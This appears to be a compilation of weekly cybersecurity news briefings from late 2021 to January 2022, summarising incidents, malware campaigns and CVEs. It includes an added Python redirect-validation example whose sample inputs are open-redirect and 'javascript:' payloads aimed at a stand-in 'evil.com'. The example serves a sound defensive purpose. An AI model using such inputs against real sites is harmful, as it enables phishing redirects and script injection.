The Microsoft Threat Intelligence Center team has been analysing the succession of cyberattacks against Ukrainian organisations since 13 January, which have affected at least 15 government institutions such as the Ministries of Foreign Affairs and Defence. According to investigators, this number could increase soon. As for the campaign itself, Microsoft warns that a new malware family called "WhisperGate" was used: malicious software aimed at destroying and deleting data on the victim's device while posing as ransomware. "WhisperGate" is said to consist of two executables: "stage1.exe", which overwrites the Master Boot Record on the hard disk to display a ransom note, whose characteristics indicate that it is fake ransomware that does not provide a decryption key, and "stage2.exe", which runs simultaneously and downloads malware that destroys data by overwriting files with static data. Journalist Kim Zetter has indicated that the entry vector used by the malicious actors would have been the exploitation of the vulnerability CVE-2021-32648 (CVSSv3 9.1) in OctoberCMS. Ukrainian cybersecurity agencies, for their part, have indicated that the actors also exploited the Log4Shell vulnerability, and have reported DDoS attacks against their infrastructure. In addition, the US Cybersecurity and Infrastructure Security Agency (CISA) has issued a statement warning organisations about potential critical threats following the recent cyberattacks targeting public and private entities in Ukraine. Microsoft has indicated that it has not been possible to attribute the attacks to any specific threat actor, which is why it is tracking these actions as DEV-0586. It should be noted that, as indicated by the Ukrainian authorities, given the escalation of tensions between the Ukrainian and Russian governments, this campaign of attacks is considered to be aimed at sowing chaos in Ukraine on the part of Russia. More info: https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/
Flaw in Safari could reveal user data
Security researchers at FingerprintJS have revealed a serious flaw in Safari 15's implementation of the IndexedDB API that could allow any website to track user activity on the Internet, potentially revealing the user's identity. IndexedDB is a browser API designed to host significant amounts of client-side data, and it follows the same-origin policy, a security mechanism that restricts how documents or scripts loaded from one origin can interact with resources from another. Researchers have discovered that in Safari 15 on macOS, and in all browsers on iOS and iPadOS 15, the IndexedDB API violates the same-origin policy. As a result, every time a website interacts with a database, a new (empty) database with the same name is created in all other active frames, tabs and windows within the same browser session, so other websites are able to see this information. FingerprintJS has created a proof of concept that can be tested from a Safari 15 or higher browser on Mac, iPhone or iPad. FingerprintJS also notes that it reported the bug to Apple on 28 November, but it has not yet been resolved. All the details: https://fingerprintjs.com/blog/indexeddb-api-browser-vulnerability-safari-15/
Microsoft releases emergency updates for Windows
Following the discovery of a number of issues caused by the Windows updates issued with January's Security Bulletin, Microsoft has released out-of-band (OOB) updates and emergency fixes for some versions of Windows 10 and Windows Server. Reports from system administrators indicate that, after deploying Microsoft's latest patches, connection problems have been reported in L2TP VPN networks, domain controllers suffer spontaneous reboots, Hyper-V no longer starts on Windows servers and there are problems accessing Windows Resilient File System (ReFS) volumes. The fixes cover a wide range of versions of Windows Server 2022, 2012 and 2008 as well as Windows 7, 10 and 11. According to Microsoft, all updates are available for download in the Microsoft Update Catalog and some of them can also be installed directly via Windows Update as optional updates. If it is not possible to deploy them, it is recommended to remove updates KB5009624, KB5009557, KB5009555, KB5009566 and KB5009543, although it should be noted that valid fixes for the latest vulnerabilities patched by Microsoft would also be removed. More: https://docs.microsoft.com/en-us/windows/release-health/windows-message-center
Cisco security flaw allows attackers to gain root privileges
Cisco has released Cisco Redundancy Configuration Manager (RCM) version 21.25.4 for StarOS software, which fixes several security flaws. The most prominent vulnerability is identified as CVE-2022-20649 (CVSSv3 9.0), a critical flaw that allows unauthenticated attackers to execute remote code with root privileges on devices running vulnerable software. The source of the vulnerability is that debug mode has been improperly enabled for certain specific services. To exploit the vulnerability, attackers do not need to be authenticated, but they do need to gain access to the devices, so they would first have to perform a detailed reconnaissance to discover which services are vulnerable. There is currently no evidence that the vulnerability is being exploited. In addition, Cisco has also patched a medium-severity information disclosure vulnerability, CVE-2022-20648 (CVSSv3 5.3). Learn more: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rcm-vuls-7cS3Nuq
Google fixes bugs in Chrome
Google has published a security advisory in which it fixes 26 vulnerabilities affecting its Chrome browser. A critical vulnerability stands out among the flaws. It has been listed with the identifier CVE-2022-0289 and was discovered on January 5th by the researcher Sergei Glazunov. This vulnerability resides in Google's Safe Browsing service, which is responsible for alerting users that they are accessing a website that could carry an associated risk. If exploited, this vulnerability could allow remote code execution. The rest of the vulnerabilities fixed have been classified, for the most part, as high severity, with only five of medium risk. Google recommends updating to version 97.0.4692.99, where these flaws are fixed. All the details: https://chromereleases.googleblog.com/2022/01/stable-channel-update-for-desktop_19.html
January 21, 2022
Cyber Security
Cyber Security Weekly Briefing 8–14 January
Microsoft security bulletin
Microsoft has published its January security bulletin, in which it has fixed a total of 97 bugs, including six 0-day vulnerabilities and nine bugs classified as critical. Regarding the 0-days, no active exploitation of these has been detected, but it should be noted that several of them have public proofs of concept, so it is likely that they will be exploited in the short term. Regarding the security flaws classified as critical, it is worth highlighting CVE-2022-21907 (CVSS 9.8), which affects the latest versions of Windows in their desktop and server editions. This is a vulnerability in the HTTP protocol stack, the exploitation of which would result in remote code execution, and it has been labelled as "wormable". The other flaw to note is another remote code execution, in this case in Microsoft Office (CVE-2022-21840, CVSS 8.8), patched for Windows versions, but not yet for macOS devices. Similarly to what happened with the 0-days, according to Microsoft, no exploits have been detected for these two vulnerabilities either. More info: https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan
New JNDI vulnerability in H2 database console
Researchers at JFrog have discovered a critical unauthenticated remote code execution vulnerability in the H2 database console. The vulnerability shares its origin with the Log4Shell vulnerability (JNDI remote class loading) and has been assigned the identifier CVE-2021-42392. H2 is a popular open source Java SQL database widely used in various projects. Despite being a critical vulnerability and sharing features with Log4Shell, the researchers indicate that its impact is smaller for several reasons. Firstly, this flaw has a direct impact because the server that processes the initial request is the same server that is affected by the flaw, making it easier to detect vulnerable servers. Secondly, the default configuration of H2 is secure, unlike Log4Shell, where default configurations were vulnerable. And finally, many vendors use the H2 database but not the console, so while there are vectors to exploit the flaw beyond the console, these other vectors are context-dependent and less likely to be exposed to remote attacks. Despite attributing less risk to this new flaw than to Log4Shell, the researchers warn that for anyone running an H2 console exposed to the LAN, the flaw is critical and they should upgrade to version 2.0.206 as soon as possible. The firm has also shared guidance for network administrators to check whether they are vulnerable to the new flaw. All the details: https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
Five new URL parsing confusion flaws
Researchers at Team82 and Snyk have published a research paper in which they study in depth how different libraries parse URLs, and how these differences in parsing can be exploited by attackers, by analysing URL parsing confusion bugs. They have analysed a total of 16 different URL (Uniform Resource Locator) parsing libraries and have detected five kinds of inconsistencies present in some of them, which could be exploited to cause denial-of-service conditions, information exposure or even, under certain circumstances, remote code execution. The five inconsistencies observed are: scheme confusion, slash confusion, backslash confusion, URL-encoded data confusion and scheme mixup. In addition to identifying these inconsistencies, they point to the detection of eight vulnerabilities that directly affect different frameworks or even programming languages and that have already been patched, except in some unsupported versions of Flask: Flask-security (Python, CVE-2021-23385), Flask-security-too (Python, CVE-2021-32618), Flask-User (Python, CVE-2021-23401), Flask-unchained (Python, CVE-2021-23393), Belledonne's SIP Stack (C, CVE-2021-33056), Video.js (JavaScript, CVE-2021-23414), Nagios XI (PHP, CVE-2021-37352) and Clearance (Ruby, CVE-2021-23435). In their study, they attach great importance to this type of URL parsing error, using Log4Shell as an example, since the bypass of Apache's initial bug fix was achieved thanks to the presence of two different URL parsers within the JNDI lookup process, each of which parsed in a different way. More: https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/
MuddyWater: Link to Iran and technical issues
The Cyber National Mission Force (CNMF) of the US Cyber Command has published a note linking the APT known as MuddyWater to Iran's Ministry of Intelligence and Security (MOIS) and detailing some technical aspects that have been associated with the group. MuddyWater was first identified in 2017, with targets located primarily in the Middle East, Europe and North America, and in the telecommunications, government and oil industry sectors. The release identifies some open source tools used by this malicious actor, including variants of PowGoop, samples of the Mori backdoor, and the sideloading of DLL files to trick legitimate programmes into executing malware. Learn more: https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/
0-day vulnerabilities detected in AWS CloudFormation and AWS Glue
Security researchers at Orca Security have detected two 0-day vulnerabilities in different Amazon Web Services (AWS) services. The first of the flaws was in the AWS CloudFormation service and consisted of an XXE (XML External Entity) vulnerability, which allowed threat actors to disclose confidential files located on the vulnerable service machine, as well as credentials for internal AWS infrastructure services. The second vulnerability, discovered in the AWS Glue service, stemmed from an exploitable feature that allowed the credentials needed to access the service's internal API to be obtained, with which administrator permissions could be gained. An AWS spokesperson assured that no customer data has been affected by the vulnerabilities in either service. It should be noted that both vulnerabilities were fixed by the AWS security team after they were reported by the researchers. All the details: https://orca.security/resources/blog/aws-glue-vulnerability/
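To make the backslash, slash, scheme and URL-encoding confusions from the URL parsing item above concrete, here is an added Python example (not code from the Team82/Snyk paper or from any of the affected projects). It compares the host Python's urllib extracts with the host a WHATWG-style browser parser would see, and shows an allow-list redirect check of the kind the patched Flask extensions needed, one that refuses every ambiguous form. The allowed host example.com and the sample URLs are constructed.

```python
"""Added example: URL parsing confusion detection and a strict redirect guard.
Not code from the Team82/Snyk research; sample URLs are constructed."""
from urllib.parse import urlsplit, unquote

# Characters different parsers treat differently: WHATWG (browsers) turns "\"
# into "/", urllib does not; control characters are stripped by some parsers only.
AMBIGUOUS_CHARS = ("\\", "\t", "\n", "\r", "\x00")


def urllib_host(url):
    """Host as Python's urlsplit sees it: a backslash is an ordinary character,
    so the userinfo "@" is still honoured inside the netloc."""
    try:
        return urlsplit(url).hostname
    except ValueError:  # e.g. malformed IPv6 literal
        return None


def browser_host(url):
    """Host as a WHATWG-style (browser) parser sees it: backslashes act as
    slashes, so 'http://evil.com\\@example.com' has host evil.com."""
    return urllib_host(url.replace("\\", "/"))


def parsers_disagree(url):
    """True when the two interpretations extract different hosts, i.e. the
    URL is one of the confusion cases the research describes."""
    return urllib_host(url) != browser_host(url)


def is_safe_redirect(target, allowed_host):
    """Allow-list check for a post-login redirect target.

    Returns True only for a plain local path or an absolute http(s) URL whose
    host equals allowed_host, and rejects every form that parsers disagree on.
    """
    if not target:
        return False
    # Backslash / control-character confusion: refuse outright.
    if any(c in target for c in AMBIGUOUS_CHARS):
        return False
    # URL-encoded data confusion: a decoded delimiter changes the meaning
    # depending on whether the consumer decodes before or after parsing.
    decoded = unquote(target)
    if decoded != target and any(c in decoded for c in "/\\:@#?"):
        return False
    try:
        parts = urlsplit(target)
    except ValueError:
        return False
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: exactly one leading slash ("//host" is scheme-relative).
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme.lower() not in ("http", "https"):
        return False  # scheme confusion / mixup (javascript:, data:, "//host")
    if parts.netloc == "" or "@" in parts.netloc:
        return False  # slash confusion ("http:///host") or userinfo trick
    return parts.hostname == allowed_host.lower()


# Constructed sample inputs exercising each confusion class (expected verdicts).
SAMPLES = {
    "https://example.com/account": True,
    "/account?tab=1": True,
    "//evil.com/": False,                       # scheme-relative URL
    "http:///evil.com": False,                  # slash confusion
    "http://evil.com\\@example.com/": False,    # backslash confusion
    "https://example.com@evil.com/": False,     # userinfo confusion
    "%2F%2Fevil.com": False,                    # URL-encoded data confusion
    "javascript:alert(1)": False,               # scheme confusion
}


def run_samples(allowed_host="example.com"):
    """Return {url: (verdict, parsers_disagree)} for the constructed samples."""
    return {u: (is_safe_redirect(u, allowed_host), parsers_disagree(u))
            for u in SAMPLES}


if __name__ == "__main__":
    for url, (safe, confused) in run_samples().items():
        print(f"{url!r:40} safe={safe!s:5} parsers_disagree={confused}")
```

The backslash case is the instructive one: urllib reports the host as example.com (so a naive allow-list check passes) while a browser would follow the redirect to evil.com.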
January 14, 2022
Cyber Security
Cyber Security Weekly Briefing 1–7 January
Mail delivery failure on Microsoft Exchange on-premises servers
On 2 January, Microsoft released a workaround to fix a bug that interrupted email delivery on Microsoft Exchange on-premises servers. The bug is a "year 2022" flaw in the FIP-FS anti-malware scanning engine, a tool enabled in 2013 on Exchange servers to protect users from malicious mail. Security researcher Joseph Roosen said the cause was that Microsoft used a signed int32 variable to store the date value, a variable whose maximum is 2,147,483,647. Dates in 2022 have a minimum value of 2,201,010,001, so they exceed the maximum number that can be stored, causing the scanning engine to fail and mail not to be sent. The emergency patch requires user intervention (it is a script that must be executed following certain instructions) and Microsoft warns that the process may take some time. The firm is also working on an update that will solve the problem automatically. More info: https://techcommunity.microsoft.com/t5/exchange-team-blog/email-stuck-in-exchange-on-premises-transport-queues/ba-p/3049447
Uber security flaw allows emails to be sent from its servers
Security researcher Seif Elsallamy has discovered a vulnerability in Uber's email system that could allow a threat actor to send emails impersonating the company. The vulnerability is in one of Uber's email endpoints, which has been publicly exposed and would allow a third party to inject HTML code and send emails pretending to be Uber. The researcher sent the digital media outlet Bleeping Computer an email from the address noreply@uber.com, which contained a form asking the user to confirm their credit card details, information that would then be sent to a server controlled by Seif Elsallamy. This email did not land in the spam folder because it came from Uber's servers. The researcher reported the vulnerability to Uber through HackerOne's bounty programme, but it was rejected as it requires social engineering to be exploited. It is not the first time this problem has been detected, as researchers Soufiane el Habti and Shiva Maharaj reported it some time ago. Likewise, the researcher states that, due to the information leak Uber suffered in 2016, there are 57 million users at risk who could receive emails pretending to come from Uber. Bleeping Computer has also contacted Uber but has not yet received a response. Full details: https://www.bleepingcomputer.com/news/security/uber-ignores-vulnerability-that-lets-you-send-any-email-from-ubercom/
Out-of-band update for Windows Server bugs
Microsoft released an out-of-band update yesterday that sought to resolve some bugs reported by Windows Server users. Some users of Windows Server 2019 and 2012 R2 were reportedly encountering excessive slowness or terminals going black. In some cases, there could also be failures when accessing servers via remote desktop. The patch for these versions is not available in Windows Update and will not be installed automatically. Instead, affected users should follow the instructions provided by Microsoft in its release. All other versions of Windows Server are expected to receive similar patches in the coming days. Learn more: https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2772
Evasive techniques of Zloader malware
Researchers at Check Point Research have analysed the new evasive techniques of the Zloader banking malware. In the new campaign analysed, which they attribute to the MalSmoke group and which they indicate has been running since November 2021, the infection begins with the installation of Atera software, a legitimate IT remote monitoring and management tool, which is used to gain initial access in a stealthy manner. Besides the use of a legitimate tool, the actors make use of malicious DLLs with a valid Microsoft signature to evade detection. To do so, the actors exploit the CVE-2013-3900 flaw, a vulnerability known to Microsoft since 2013 whose patch is disabled by default, and which allows an attacker to modify signed executables by appending malicious code without invalidating the digital signature. Full information: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/
Elephant Beetle: a group with financial motivations
Sygnia's incident response team has published an article presenting its analysis of Elephant Beetle, a financially motivated group that is attacking multiple companies in Latin America and which they have been tracking for two years. Also classified as TG2003, this group spends long periods of time studying its victim, as well as its transfer system, going unnoticed by security systems by imitating legitimate packages and using an arsenal of more than 80 tools of its own. Elephant Beetle's preferred entry vector is leveraging legitimate Java applications deployed on Linux systems. Sygnia highlights the exploitation of old, unpatched vulnerabilities such as CVE-2017-1000486 (Primetek Primefaces), CVE-2015-7450 (WebSphere), CVE-2010-5326 and EDB-ID-24963 (SAP NetWeaver). Once the victim has been studied, the group creates fraudulent transactions of small amounts that mimic the company's legitimate movements. Although the attribution is not yet clear, Sygnia explains that, after multiple analyses of incidents involving Elephant Beetle in which it has found patterns such as the word "ELEPHANTE" or multiple C2s located in Mexico, the group could have a connection with Spanish-speaking countries, more specifically with Latin America, and Mexico could be its area of origin. More: https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia- Elephant Beetle_Jan2022.pdf
January 7, 2022
Cyber Security
Cyber Security Weekly Briefing 28-31 December
Smishing campaign impersonating MRW and Sending using real order data
Numerous Twitter users are reporting a smishing campaign in which the logistics companies Sending and MRW are being impersonated. The first reports were made on 26 December, when customers of brands such as Pampling, Druni and Primor reported that Sending, their courier service provider, had suffered an incident and that SMS messages were being sent in the name of Sending requesting bank details in order to complete the delivery of an order. What is relevant in this case is that the SMS messages received referred to real orders that had been placed, according to the users themselves, which is why a possible information leak at Sending has been raised, which the attackers would be using to give credibility to the SMS messages sent. The SMS messages include personal information such as the name and type of order, as well as a URL pointing to an illegitimate domain, "envios-sending[.]com", together with a parameter created so that the phishing page can only be viewed by that user. When accessing the link, a phishing page requesting the user's bank details in order to complete the delivery is shown. In the last hours of yesterday afternoon, reports of cases involving MRW for the same fraud also began, forcing the company to send a notification to its users warning them of the importance of not entering bank details requested via SMS. In this case, as with Sending, an illegitimate domain, "envios-mrw[.]com", was also used. Since the beginning of this campaign, users on social networks had been denouncing a "hacking" of these companies; this hypothesis was confirmed in a statement issued by MRW on 29 December, in which it indicated that it had notified a security breach to the Spanish Data Protection Agency, stating that the identity and contact details of recipients had been affected. Sending, for its part, warned its users about the security breach on the 27th by SMS. All the details: https://www.mrw.es/comuns/noticia/sms-mrw-smishing.pdf
Vulnerabilities in DataVault storage encryption
Security researchers have reported two new vulnerabilities in DataVault software, and in systems derived from it, used for data encryption in storage solutions from WD (owner of SanDisk), Sony and Lexar. One of the flaws is due to the use of a cryptographic hash with a predictable salt, which makes the hashes vulnerable to dictionary attacks (CVE-2021-36750). The software also employs a password hash with insufficient computational effort, which would allow an attacker to obtain user passwords through brute-force attacks, thus exposing the data to unauthorised access (CVE-2021-36751). Both flaws in the key derivation function have been resolved in DataVault version 7.2, so it is recommended to upgrade the software to that version immediately. More info: https://pretalx.c3voc.de/rc3-2021-r3s/talk/QMYGR3/
LastPass user master password exposure reports
Several users have reported in recent hours a possible compromise of their LastPass password manager master password. The reports come after they received a lockout notice for unauthorised access to their LastPass account from an unknown location. According to the company, no evidence has been found of the exposure of their data, meaning that the blocking would have been carried out because the users had reused these credentials in other services, where they could have been exposed and become susceptible to use in credential stuffing attacks. However, this justification by LastPass does not fit, according to some users, with the reports that they allegedly received again after setting up new, unique passwords. It has also been raised as a possibility that the warnings were sent in error. It is therefore unknown whether or not there has been any exposure of credentials, and by which vector they could have been exposed. For his part, researcher Bob Diachenko has checked whether some of the users who reported receiving the warnings were among those affected by malware such as RedLine, ruling out this option as well. LastPass has recommended activating two-factor authentication to prevent unauthorised access. This incident highlights the importance of never reusing passwords between services, especially when it is the master password of a password manager. All the information: https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/
New arbitrary code execution vulnerability in Log4j
This week, security researcher Yaniv Nizry once again caused a stir with a Twitter post warning of the discovery of a new remote code execution vulnerability in Log4j, affecting the latest version, 2.17.0. Some prominent researchers such as Kevin Beaumont urged people to remain calm until more details were known and, within minutes of the publication, warned of the detection of alleged exploits for this new bug that were nothing more than trojans, a common practice whenever a high-profile bug such as this one is reported. A few hours later, researcher Marc Rogers published the CVE associated with this new vulnerability, CVE-2021-44832, and also indicated that exploiting this flaw requires a prior change to the default configuration, which complicates its exploitation. This same idea was immediately shared by other renowned researchers such as Will Dormann, who yesterday, after Yaniv Nizry's research was made public, criticised Checkmarx, the researcher's firm, for creating alarm with this new flaw. Exploiting this flaw requires the attacker to have administrator permissions on the very system to be compromised, since, in order to exploit it, the attacker must first be able to modify the logging configuration file. This scenario does not make much sense in itself, but some users insist on pointing to the insider who modifies the file as a possible risk (although it is true that, if there is an insider, there are other, greater risks). That said, we are therefore dealing with an arbitrary code execution vulnerability, not a remote code execution vulnerability as initially thought, and it has been assigned a moderate severity, with a CVSSv3 of 6.6. The specific flaw is due to the lack of additional controls on JNDI access in Log4j. Apache has now released version 2.17.1 to fix the bug. Despite Yaniv Nizry's self-attribution of the bug, and although he has also published an article detailing his research, Apache has not included his name in the credits for the vulnerability. Know more: https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44832
January 3, 2022
Cyber Security
Cyber Security Weekly Briefing 11 – 17 December
New campaign distributing the Anubis banking trojan
Researchers at Lookout have reported a malicious campaign distributing a new version of the Anubis banking trojan, obfuscated in an Android mobile app pretending to be from the French telecommunications company Orange. Malicious actors have reportedly targeted a total of 394 financial apps, such as banks, cryptocurrency wallets and virtual payment platforms, with the aim of exfiltrating credentials for these services. Anubis is a banking trojan that has been known since 2016 and whose development has never stopped. Once installed on the victim's device, it works by displaying fraudulent login forms for the applications it targets in order to compromise the user's credentials, and offers other functions such as screen and sound recording, sending and reading SMS, or scanning the device for files of interest to exfiltrate. According to the investigation, the distribution of the fraudulent Orange app is reportedly carried out via malicious websites, direct messages on social networks, smishing and forum postings. More info: https://www.bleepingcomputer.com/news/security/anubis-android-malware-returns-to-target-394-financial-apps/
Log4Shell vulnerability
Last Friday, December 10, a 0-day vulnerability in Apache Log4J was reported, identified as CVE-2021-44228. The vulnerability affects the Apache Log4J 2 Java logging library, which, being an open source library, is used by diverse applications of companies around the world. The exploitation of this flaw would allow the execution of malicious code on servers or application clients. The risk related to this vulnerability came from a combination of factors: on December 9, the day before the corrected version was published, an exploit was already available for this vulnerability; the exploitation is simple; and Log4J is used worldwide in many web applications. This vulnerability was initially corrected in Log4J 2.15.0. However, a few days later a second vulnerability became known, CVE-2021-45046, derived from an incomplete correction of the Log4Shell vulnerability, and Log4J version 2.16.0 was released to definitively correct the vulnerabilities. Initially, this second vulnerability was catalogued as a denial of service and given a CVSSv3 of 3.7, although, in the last hours, the score has been raised to 9 and its category changed to remote code execution. After the publication of this vulnerability, various exploitation attempts have become known, such as infection attempts by botnets for the installation of cryptominers, as well as its use for distributing ransomware (Khonsari) or the StealthLoader trojan. It is important to highlight that there is evidence of exploitation as early as December 9, although mass exploitation would have come after the publication of the exploit. Regarding the affected products, the complete list has not been defined yet. During the week, the affected products slowly became known, the most complete list being the one published by the Nationaal Cyber Security Centrum (NCSC-NL). More details: https://logging.apache.org/log4j/2.x/security.html
Emotet returns to using Cobalt Strike
Security researchers warned yesterday that, after a brief pause in Emotet's operations last week, threat actors have once again begun installing Cobalt Strike beacons on Emotet-infected devices. As reported by security researcher Joseph Roosen from the Cryptolaemus threat-research group, Emotet is downloading the Cobalt Strike modules directly from its Command & Control server and then executing them on infected devices. In this way, the attackers gain immediate access to the compromised networks. To do so, the threat actors use a malicious jQuery file to communicate with the C2 and receive further instructions. Despite being a malicious file, most of its code is legitimate, making it easier to evade the victim's security systems. Due to the increase in Cobalt Strike beacons distributed to already infected computers, companies are expected to experience an increase in security incidents in the coming months. All the details: https://www.bleepingcomputer.com/news/security/emotet-starts-dropping-cobalt-strike-again-for-faster-attacks/
New exploits for vulnerabilities already fixed by Microsoft
In the last few hours, new exploits have been detected for several vulnerabilities that were fixed in previous Microsoft bulletins: CVE-2021-42287 and CVE-2021-42278. The first of the flaws, CVE-2021-42287 (CVSSv3 8.8), is an elevation of privilege vulnerability in Active Directory Domain Services, fixed by Microsoft in its security bulletin last May. This flaw, according to Microsoft itself, affects the Kerberos Privilege Attribute Certificate (PAC) and allows an attacker to impersonate domain controllers. To exploit it, a compromised domain account could have the Key Distribution Centre (KDC) create a service ticket (ST) with a higher privilege level than the compromised account. The attacker would achieve this by preventing the KDC from identifying which account holds the higher-privileged ST. If this flaw is chained with another vulnerability fixed in the November bulletin, CVE-2021-42278 (CVSSv3 8.8), it would allow attackers to obtain domain administrator rights in any Active Directory environment. The exploit chain is extremely easy to exploit, allowing adversaries to escalate privileges even without access to the underlying standard user account. An update is available for all supported operating systems. In any case, the mitigation is to patch the affected domain controllers by deploying Microsoft's 11/14/2021 patch (KB5008602), which fixes the PAC confusion issue, as well as the S4U2self issue created by the previous patch (KB5008380). However, some sources mention that the KB5008602 patch is only effective on Windows Server 2019, so it is recommended to consult the following guide in order to mitigate the issue on other product versions. There is currently no known active exploitation of these flaws, but we do note that there is a post explaining how this problem could be exploited, as well as a tool on GitHub that scans for and exploits these vulnerabilities. In addition, comments are beginning to appear on social networks about the possible combination of these flaws with the critical Log4j vulnerability. Know more: https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
Vulnerabilities in Lenovo devices
Security researchers at NCC Group have discovered two new vulnerabilities in the IMController component found in multiple Lenovo devices, including Yoga and ThinkPad laptops, which affect all versions of Lenovo System Interface Foundation prior to 1.1.20.3. Lenovo System Interface Foundation is a system that runs with SYSTEM privileges and helps Lenovo devices communicate with universal applications, providing the user with functions such as system optimisation and driver updates, among others. If disabled, Lenovo applications would no longer function properly. The newly identified vulnerabilities (CVE-2021-3922 and CVE-2021-3969, CVSSv3 7.1) could allow a malicious user to execute commands with administrator privileges. The first is a race condition vulnerability that would allow interaction with the secondary "Pipe" process of IMController. The second is a TOCTOU (time-of-check to time-of-use) flaw that, if exploited, could allow privilege escalation on the vulnerable device. NCC Group alerted Lenovo to both bugs last October, and Lenovo finally issued updates on 14 December that fix both bugs, so it is recommended that IMController be updated to version 1.1.20.3. More information: https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/
December 17, 2021
Cyber Security
Cyber Security Weekly Briefing 4 – 10 December
Catalan government suffers DDoS attack
According to the statement issued by the Catalan government, the Centre de Telecomunicacions i Tecnologies de la Informació (CTTI) detected last Friday a cyber-attack that compromised more than 2,000 of the organisation's computer applications for approximately 3 hours. The attack was a distributed denial-of-service (DDoS) attack, which consists of collapsing services by increasing the volume of traffic so that the servers' processing time grows. Regarding the origin of the attack, the Generalitat has indicated that initial investigations suggest it could be an attack contracted through the dark web, although at the moment there is no confirmation of this. Several websites and services dependent on the Generalitat, such as La Meva Salut, were affected, and other services such as Catalan television, TV3 and Catalunya Ràdio also experienced technical problems. Eventually, within a period of no more than three hours, the situation was under control and normality was restored, as the organisation itself has confirmed.
More: https://govern.cat/salapremsa/notes-premsa/416324/nota

Emotet: new campaigns using Trickbot and Cobalt Strike in their infections
Researchers at Check Point have published an analysis of the resurgence of Emotet. According to the researchers, these new campaigns use Trickbot as an entry vector, one of the most widely used botnets, which in recent months has infected up to 140,000 victims worldwide, with more than 200 campaigns and thousands of IP addresses on compromised devices. Trickbot, like Emotet, is commonly used to distribute ransomware such as Ryuk or Conti. Check Point analyses these new campaigns, in which Trickbot has been observed distributing Emotet.
They point out that Emotet has improved its capabilities with new features such as the use of elliptic curve cryptography instead of RSA, improvements in its control flow flattening methods, and adding to the initial infection the use of malicious Windows application installation packages that mimic legitimate software. On the other hand, it is worth noting that Cryptolaemus researchers have reported that in some cases Emotet is directly installing Cobalt Strike on compromised devices, which speeds up the infection process by giving immediate access to lateral movement, data theft or ransomware distribution.
Learn more: https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/

RCE vulnerability in Windows 10 and 11
Security researchers at Positive Security have discovered a drive-by remote code execution vulnerability in Windows 10 and 11. This flaw is triggered through Internet Explorer 11/Edge Legacy, the default browser on most Windows devices, by means of an argument injection into the Windows default URI handler ms-officecmd. An attacker could exploit this vulnerability via a malicious website that redirects to a crafted ms-officecmd URI. It should be noted that Microsoft Teams must be installed on the system for the exploit to work. Following Positive Security's report of the flaw in March, Microsoft initially dismissed it and, after an appeal by the researchers, classified it as critical. In August, Microsoft partially fixed the bug, but argument injection is still possible.
All the info: https://positive.security/blog/ms-officecmd-rce

0-day vulnerability in Apache Log4j
A PoC has been published for a 0-day vulnerability, recently assigned CVE-2021-44228, allowing code execution in Apache Log4j, an open-source Java library that lets software developers record and write log messages and is used in many applications by companies around the world.
This flaw allows malicious code to be executed on application servers or clients, among the most prominent being those running Java versions of the Minecraft video game, by manipulating log messages and even messages typed into the game's own chat. According to LunaSec researchers, Java versions higher than 6u211, 7u201, 8u191 and 11.0.1 are not affected by this attack vector. Furthermore, LunaSec indicates that the Steam and Apple iCloud cloud services have also been affected. Lastly, it should be noted that the affected versions of Apache Log4j are 2.0 to 2.14.1, with this security flaw being corrected in version 2.15.0.
All the details: https://www.lunasec.io/docs/blog/log4j-zero-day/

Analysis of Russian state actor Nobelium
Researchers at Mandiant have published an article detailing operations carried out by Nobelium, an actor associated with the Russian Foreign Intelligence Service (SVR). Mandiant reports that the tactics employed by the group to gain initial access to the victim's infrastructure include the use of credentials compromised in previous malware campaigns in which the CRYPTBOT stealer was used, the compromise of cloud service providers (CSPs) and the abuse of MFA push notifications. Once initial access is gained, the actor attempts to gain persistence and escalate privileges using the RDP protocol, employing WMI and PowerShell to distribute the BEACON backdoor on the victim's network. This backdoor was later used to install a new tool they have named CEELOADER, a downloader that communicates via HTTP with Nobelium's C2 and which distributes Cobalt Strike. In addition, Mandiant highlights the use of residential IP proxy services to authenticate to the victim's systems and the use of compromised WordPress sites to host the payloads that lead to the second stage of the infection chain.
Likewise, the French National Cybersecurity Agency (ANSSI) has issued a statement specifying that since last February multiple campaigns against French organisations originating from this Russian actor have been detected.
More info: https://www.mandiant.com/resources/russian-targeting-gov-business
December 10, 2021
Cyber Security
Cyber Security Weekly Briefing 20-26 November
Reacharound: possible resurgence of the triple threat Trickbot-Emotet-Ransomware
Last January, an international action orchestrated by Europol and Eurojust led to the dismantling of the Emotet infrastructure, a malware widely used in the early stages of the ransomware infection chain. According to security researchers, these events contributed to the shutdown of multiple high-level ransomware-as-a-service (RaaS) operations. However, since last week there have been reports of a resurgence of the threat from researchers such as GData and AdvIntel, who have indicated that operators of the Conti ransomware have allegedly convinced the former Emotet operator to rebuild its infrastructure. These actions were allegedly carried out through a campaign named "Reacharound", characterised by the infection of devices with TrickBot carrying an Emotet payload. AdvIntel researchers estimate that the return of this threat will have a significant impact on ransomware operations for three reasons: the high sophistication of Emotet's capabilities, the promotion of crime-as-a-service in this area and the return of the classic TrickBot-Emotet-Ransomware triple threat.
More: https://securityaffairs.co/wordpress/124807/cyber-crime/trickbot-emotet-conti-triad.html

PoC published for a vulnerability in Microsoft Exchange
